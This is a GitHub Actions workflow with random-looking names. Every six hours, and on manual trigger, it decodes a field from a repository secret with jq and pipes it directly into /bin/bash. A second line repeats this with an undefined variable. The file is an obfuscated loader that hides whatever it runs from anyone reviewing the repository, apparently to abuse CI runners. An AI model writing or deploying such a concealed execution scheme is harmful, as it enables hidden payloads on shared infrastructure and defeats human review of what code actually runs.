name: huhuangzhang6574

on:
  workflow_dispatch:
  schedule:
    - cron: '58 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huhuangzhang6574
        env:
          otftz02165: ${{ secrets.otftz02165 }}
        run: |
          echo $otftz02165 | jq -r .by91 | /bin/bash
          echo $ekh1 | jq -r .bj24079 | /bin/bash

